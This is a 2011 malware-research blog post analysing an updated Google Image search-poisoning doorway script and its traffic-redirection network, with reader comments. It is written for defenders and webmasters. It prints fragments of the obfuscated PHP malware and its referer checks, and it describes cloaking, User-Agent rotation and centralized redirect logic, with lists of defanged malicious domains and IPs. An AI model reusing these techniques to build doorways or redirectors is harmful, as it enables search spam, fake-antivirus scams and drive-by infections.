msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Google Image Poisoning. What’s New in June?

   29 Jun 11   Filed in Website exploits

This is the second (more techie) part in the series of posts about a new wave of the Google Image poisoning attack. This part will heavily refer to the detailed description of the attack that I made back in May. Most of the aspects are still true so I will only talk about changes here. If you want to have a complete picture, I suggest that you read the original description first.

Changed doorway behavior

After May 18th, I noticed that doorway pages no longer redirected me anywhere when I clicked on poisoned search results. Neither to bad sites nor to home pages of compromised sites. Instead they displayed the spammy content generated for search engine crawlers only.

That was strange. That could never happen if the old algorithm was still in use.

Then I checked the cache directories (./.log/compromiseddomain.com/) and found new maintenance files there: don.txt and xml.txt. The don.txt file contained HTML template of spammy pages and was a replacement for the shab100500.txt file used by the original algorithm. The xml.txt contained the following string: bG92ZS1ibG9nY29tLm5ldA==, which decoded (base64) to “love-blogcom.net“. It was clear it was a more secure replacement for xmlrpc.txt that stored the domain name of a remote malicious server in plain text.

A few days later, the xml.txt files was replaced by xml.cgi, which was a clever step since .cgi files produce server errors when you try to open them in directories that aren’t configured to execute CGI scripts.

So I knew that the doorway script was updated, but I couldn’t understand why the doorways exhibited no malicious behavior when I clicked on hijacked image search results. That didn’t make much sense. What was the purpose of showing those spammy unintelligible pages without trying to monetize the traffic? The only plausible idea was they were playing the “long game” and needed some time to have the new pages rank well without risks of being identified as cloaked or malicious content, and when many pages reach prominent positions in search results they’ll start redirect web searchers to bad sites. Well, that was a working hypothesis until I got the source code of the new doorway script. The reality is crooks don’t want to play “long games” if they can monetize right away – the new doorway pages did redirect to bad site but my virtual environment wasn’t properly configured to trigger the redirects.

Dissecting the updated Google Image poisoning attack

So let me tell you what exactly has changed in this script and how those changes affect web searchers and Google.

The file is similarly obfuscated:

<?php print(gzuncompress(base64_decode('eNqNWG1v4kYQ/.../AW9Zhls='))); ?>

and the overall algorithm looks pretty much the same. But when you look into details you’ll soon see the key changes

Google is the only target

While the previous version targeted visitors from Google, Yahoo and Bing

if ( strpos( $_SERVER["HTTP_REFERER"], "google.") || "strpos"( $_SERVER["HTTP_REFERER"], "yahoo." ) || "strpos"( $_SERVER["HTTP_REFERER"], "bing." )> 0 ) {...

the new version is only interested in visitors from Google

if ( strpos( $_SERVER["HTTP_REFERER"], "google." ) > 0 ) {...

It looks like traffic from Yahoo and Bing is so negligible that it isn’t worth the effort.

New redirection system

Now the answer why I couldn’t trigger malicious redirects.

In the previous version, to trigger the redirect, it was enough to be a human visitor (not a known bot) coming from major search engines and your search query should not contain the “site:” operator. There was a fixed redirect script in the iog.txt file that changed roughly every 30 minutes and within that time all visitors were being redirected to the same intermediate traffic direction system (TDS) server.

The new redirect mechanism is more flexible and sophisticated:

Built-in TDS functionality

If the request looks eligible (comes from Google and the search query doesn’t contain the “site:” operator), the script tries to obtain a redirect URL from a remote server. That remote server decides in real time, whether that particular visitor should be redirected and where.

The domain name of that remote server is stored as a base64-encoded string in the xml.cgi file. By default, it is mydiarycom.net (base64:bXlkaWFyeWNvbS5uZXQ=).

The request for the redirect URL goes to hxxp://mydiarycom.net/out/stat.cgi?parameter?=… . In parameters, it passes all the pertinent information about the visitor and the doorway site:

  • the domain name of the doorway site
  • the full URL of this doorway script (there may be several scripts on the same server)
  • the visitor’s IP address
  • the referring URL (in this case Google search URL)
  • the User-Agent string of the visitor’s browser
  • the search query that was used on Google to find this doorway

It is easy to see benefits of this new approach.

It allows to collect important statistics on the mydiarycom.net server. For example, now the attackers can see what search queries people use to find doorway pages (previously they could only guess based on URLs of referring doorway pages, which rarely were exact matches of Google searches ).

What’s more important, now they have a centralized system that manages redirects throughout all doorway sites. No need to update iog.txt files on each site. No need to update the whole script if they decide to change something (e.g. blacklist some IP addresses or redirect visitors to country-specific landing pages)

Dependency on IP address and User-Agent

The most important parameters that affect the redirect URLs are visitors’ IP addesses and the User-Agent strings. I tested several dozens of combinations of various IPs and UAs. At this point mydiarycom.net has three types of response that break traffic into three major categories:

  1. Mac traffic
  2. PC traffic
  3. Unwanted traffic

1. Redirect to a fake Mac antivirus site (e.g. “Apple security center”). – For all visitors whose web browsers have “Macintosh” in their User-Agent strings.

The typical redirect URL looks like this:

hxxp://89 .149 .226 .210/r/7073b499d369ec84a9cf110af621946c7bbbec33005b3e13

the IP address of the server and the string after /r/ regularly change. I’ve seen the following IPs in the fake Mac AV URLs:

  • 178.162.157.199 (Belize, Belmopan Netdirect 178.0.0.0 – 178.255.255.255)
  • 178.162.173.44 (Belize, Belmopan Netdirect 178.0.0.0 – 178.255.255.255)
  • 184.82.190.247 (United States, Network Operations Center Inc 184.0.0.0 – 184.255.255.255)
  • 188.72.248.140 (Belize, Belmopan Netdirect 188.0.0.0 – 188.255.255.255)
  • 212.124.107.190 (United States, Amsterdam Mnogobyte Llc 212.124.107.0 – 212.124.107.255)
  • 212.124.123.180 (United States, Amsterdam Mnogobyte Llc 212.124.120.0 – 212.124.123.255)
  • 212.124.123.182 (United States, Amsterdam Mnogobyte Llc 212.124.120.0 – 212.124.123.255)
  • 212.95.55.96 (Hong Kong, Netdirect 212.95.55.0 – 212.95.55.255)
  • 78.159.122.140 (Hong Kong, Netdirect 78.0.0.0 – 78.255.255.255)
  • 78.159.122.23 (Hong Kong, Netdirect 78.0.0.0 – 78.255.255.255)
  • 80.86.81.27 (Germany, Intergenia Ag 80.86.81.0 – 80.86.81.255)
  • 82.146.47.167 (Russian Federation, Ispsystem Cjsc 82.146.40.0 – 82.146.47.255)
  • 89.149.226.210 (Germany Netdirect 89.149.226.0 – 89.149.227.255)
  • 91.213.117.213 (Ukraine, Safe Service Xxi (mhost Dc) 91.213.117.0 – 91.213.117.255)
  • 91.226.212.64 (Ukraine, Pe Ivanov Vitaliy Sergeevich 91.226.212.0 – 91.226.213.255)
  • 95.158.185.67 (Bulgaria Novatel Eood 95.0.0.0 – 95.255.255.255)

2.1 Redirect to a general browser exploit site. – For visitors on non-Mac computers that use browsers other than Chrome.

The typical URL looks like this:

hxxp://rljdxskunks .info/index.php?tp=81350e0ebb536599

again, the domain name and the tp parameter regularly (roughly every 30 minutes) change. Here are some more domains of exploit pages:

  • xdasmeandered .info – 209.85.147.105 (California – Mountain View – Google Inc)
  • artfitful .info – 209.85.147.105
  • fitfuldot .info – 209.85.147.105
  • bestinstitutionally .info – 209.85.147.105
  • yrsimeandered .info – 209.85.147.105
  • rljdxskunks .info – 109.230.246.226 (Germany, Marcel Edler Trading As Optimate-server)
  • arcskunks .info – 109.230.246.226
  • bhelskunks .info – 109.230.246.226
  • fzfjjskunks .info – 109.230.246.226
  • hzoyoskunks .info – 109.230.246.226

2.2. Alternatively, non-Mac computers (including Chrome browsers) are redirected to a fake PC antivirus site (e.g. “Windows Security 2011″)

hxxp://fwhzimpluck .info/fast-scan/

  • hpluck .info – 95.64.48.132 (Romania, Netserv Consult Srl)
  • confuseps .info
  • wbfiibpluck .info
  • osyqdhinequitable .info
  • pluckypu .info
  • canadianizeajvfil .info
  • canadianizex .info
  • upgncanadianize .info
  • canadianizevd .info

3. Nothing returned (No redirect will be issued. The spammy page will be displayed instead)

  • for known search engine bots (based on IP and UA)
  • for visitors who use Google Chrome (only when the exploit vector is active)
  • for visitors from Russia, Ukraine and Belarus who don’t use Macs.

Interesting sidenotes

ex-USSR traffic

I couldn’t originally trigger the redirect because I used Internet Explorer UA along with a Russian IP address. Now I can see that the attackers are not interested in Russian non-Mac traffic — probably this traffic is hard to monetize. On the other side, Mac owners in Russia are quite wealthy people who have credit cards and can easily afford paying $50-100 (and many of them can read in English).

At the same time, traffic from other countries with low purchasing power (e.g. Turkey, China, Romania) is treated no different then traffic from the United States or the European Union. This also suggests that the attackers are originally from the former Soviet Union.

Google Chrome

Google Chrome seems to be immune to the exploit that is currently used for non-Mac visitors.

Malware on Google’s server?

You might have noticed, many exploit sites (e.g. fitfuldot .info) were hosted on a server with the IP address of 209.85.147.105. The irony is this address belongs to Google. The domain names no longer resolve, but you can see the historical records on DomainTools.com. For example, check the record for fitfuldot .info and click on the “Server Stats” tab — you will see that the server belongs to “California – Mountain View – Google Inc” and has the gws (Google Web Server) type. And if you check more information for that IP address you’ll see that”281 websites use this address. (examples: abroaddomain .info abroadhosting .info abroadsmart .info abroadsoft .info)” – they all belong to the same attack.

And if you check Safe Browsing diagnostic page for osyqdhinequitable .info (fake AV site) you’ll see that at some point it was hosted on AS15169 (Google Internet Backbone) network.

Now that the malicious domains have been shut down (their name servers currently read as: NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM), if you navigate your browser to http://209.85.147.105/ you’ll see a real Google’s home page.

Any ideas how hackers managed to use Google’s own server?

Update (June 29, 2011): Some readers note that Google might have simply sinkholed those malicious domains. Good point! Indeed, I don’t actually remember when I resolved those domain names as the whole investigation took several weeks. Probably I did it a few days after I checked the malicious content on those domains (I wish I checked HTTP headers back then!). And the NS(1|2).SUSPENDED-FOR.SPAM-AND-ABUSE.COM name servers suggest that the current IP address is different from the original IP address. In either way, I didn’t think that Google’s server was hacked. I thought this could be some service that allowed to create websites on Google’s infrastructure (e.g. Google Sites, Google App Engine, or something like this — hardly anyone can remember them all ;-) What do you think?

Other changes and observations.

Rotating User-Agent.

In the doorway script, the internal function that downloads search results from Google (they are used to compose spammy pages) now randomly rotates three different User-Agent strings. This way the script tries to evade being detected as automated requests to Google.

Passwords-protected

The maintenance requests to the script are now passwords-protected. To be able to change the xml.cgi file (with the domain name of the remote server) and to use a file uploader, you now need to provide a password in the “name” parameter of a POST request. The MD5 value of that password must be equal to “42a3f0678d1bbb517272142f5b3df3cd” (any ideas what the password is?).

This way they can protect their doorways from other parties who might want to hijack them and redirect the traffic to third-party sites. In previous version, anyone who knew the algorithm (for example, having read my blog post) could easily upload files to compromised sites.

To have Google discover the doorway pages on hacked sites, cybercriminals create link pages on free sites. It’s usually some free hosted blogging services like blog.fc2.com. So they create hundreds of blogs and regularly publish posts that consist of hundreds of links to doorway pages.

Spam on Ning.com

I’ve found an interesting variation of this approach lately. Instead of creating new blogs, they register with existing Ning.com communities and post spammy comments and blogposts there. Again, each post consists of hundreds of links to doorway pages and to similar spammy posts on other Ning.com sites. (I found 700+ ning sites with the spammy link pages)

Such rogue ning.com users usually have unintelligible names like “cfulahlz” or “yflcypzt“. Sometimes they are registered as males, sometimes as females. However, it is easy to spot such users as they always specify “Wiggins, CO, United States” as their location. The following Google search can help reveal hundreds of such rogue users: [site:ning.com "Wiggins, CO"]

“Sitemap” links

At some point the linking scheme also included compromised sites where hackers injected cloaked spammy links (visible only if you pretend to be a Googlebot). What’s interesting, I’ve found 115 such hacked sites and they are all hosted on 10 IP addresses that belong to 4 different hosting providers (according to DomainTools.com): Liquid Web Inc, Tailor Made Servers, Hostmysite and Nashua Goldenware. When I tryied to check other sites on the same IPs, they all were similarly hacked. This fact suggests that whole servers were hacked rather than individual sites.

Fortunately, those servers seem to had been cleaned up a few days ago, but you can still see the signs of the attack in Google’s search results for ["Sitemap 2295 * Sitemap 4008 * Sitemap 2960"] – and for some results you can still see cached pages with links to spammy “sitemaps”.

Can Google efficiently blacklist doorway sites?

Once I revealed the linking schemes, it was quite easy to compile a list of 10,000+ unique compromised sites with doorway pages.

Screenshot: flagged sites

As I mentioned on June 23rd, Google had a very low detection rate of about 3% for those doorway sites. Earlier that day, I sent my list of then 9,000+ hacked sites along with the decoded doorway script to Google.

Five days later, I’m going through my list again and now I can see some improvements. Google seems to be scanning sites from my list in an alphabetical order. At this point, I can see that roughly 20% of the domain names that start with digits or with letter “a” have been blacklisted by Google (which means that only about 700 sites from my list have been processed). The rest of the list (about 10,000 sites) still have the same low percentage (~3%) of flagged sites.

In May, in took significantly less time for Google to flag a hefty part of all doorway sites that poisoned Google Image search. Of course, that wave of the black hat SEO attack had a noticeable side effect: imgaaa & co img and iframe tags injected into index pages of hacked sites. So Google only needed to find those tags on infected sites. That worked like a charm and helped them flag over 34,000 sites and mitigate the attack in a very short time.

Unfortunately, this new wave doesn’t have such easily detectable signs and Google needs to improve their scanners to be able to detect malicious behavior despites of all new countermeasures that hackers invent. At this point, I can see that after June 23rd Google hasn’t picked up malware on quite a few doorway sites that still redirect visitors to bad sites.

Given these problems with detection, it is important for Google to keep on improving the ranking algorithm so that computer-generated doorway pages have very little chance of being displayed on first pages of search results.

To webmasters

Sites, that have been blacklisted after June 23rd mostly have the following non-informative and quite confusing descriptions on their Safe Browsing diagnostic pages:

“Of the 7 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-06-24, and suspicious content was never found on this site within the past 90 days.”

or

“Google has not visited this site within the past 90 days. Suspicious activity was detected over 90 days ago, but no data is available for the past 90 days.”

Note that the pages say that either “0 page(s) resulted in malicious software being downloaded and installed” or “no data is available for the past 90 days“. At the same time, no malicious or intermediary domains are mentioned.

It looks like Google’s anti-malware system is not yet properly configured to deal with this sort of problem. I guess that some experimental module is involved in detection of these malicious doorways so the lack of details on diagnostic pages and in the “Malware” section of Google Webmaster Tools is explainable.

Meanwile, if you see such diagnostic pages for your blacklisted sites, consider searching your server for doorway files. For example, I find [site:example.org] and [site:example.org inurl:page] Google searches very helpful to detect this problem (replace example.org with your site’s domain name).

If you wonder how hackers managed to break into your site, I can tell that I have enough evidence that they used stolen FTP credentials. So to prevent reinfections, it is important to change all passwords and refrain from saving them in FTP clients.

You can find more information on how to detect this attack and clean up your site in my previous article.

Related posts:

Reader's Comments (3)

  1. |

    [...] Back in May I posted about WordPress websites distributing malware in Google Image SERP. This research was done by Denis Sinegubko, a malware researcher and the developer of Unmask Parasites, a tool to help you find security vulnerabilities and hidden content on your website. In between putting together another mammoth blog post on Google image poisoning, [...]

  2. |

    Thanks for these articles. I’ve been experiencing somewhat similar attacks, but for me its Google search that’s the target.

    Unfortunately, I’m pretty new to security issues of this type — especially in the context of CMSs — and am still uncertain about all the ways the bad guys can get in. Maybe I’ll find a nice list of general doorways, and a recipe of the basics.

    For now, however, I’m curious about your stolen FTP ideas. I’m not stupid enough to think that Macs are immune from malware, but do you know of anything specific on Mac? And do you know if ClamXav (or ClamAV on Windows) will find these? For me, I think that the doorway being exploited has to do with the CMS, since only sites exploited last year with an older CMS have been affected. But I don’t want to ignorantly rule out FTP.

    • |

      There are actually many similar ongoing search results poisoning campaigns. Not all of them use the FTP vector. Some use security holes in web applications. Sometimes hackers even use internal security flaws of hosting providers to create rogue doorway pages on all websites on compromised servers.

      If you have your site’s FTP logs (you can ask your hosting provider) you can find out whether someone from unknown IPs logged into your site and uploaded fishy files there. And with web server’s raw access logs, it is usually possible to reveal attack on your web application.

      P.S. I’m not a Mac user and never tried any of AV solutions available for Macs. I read a lot about a free Mac antivirus from Sophos though. I know it detects new Fake AVs for Macs. Not sure about password-stealing malware on Mac. At this point, it’s mainly a PC problem, but Mac malware evolves every day so who knows.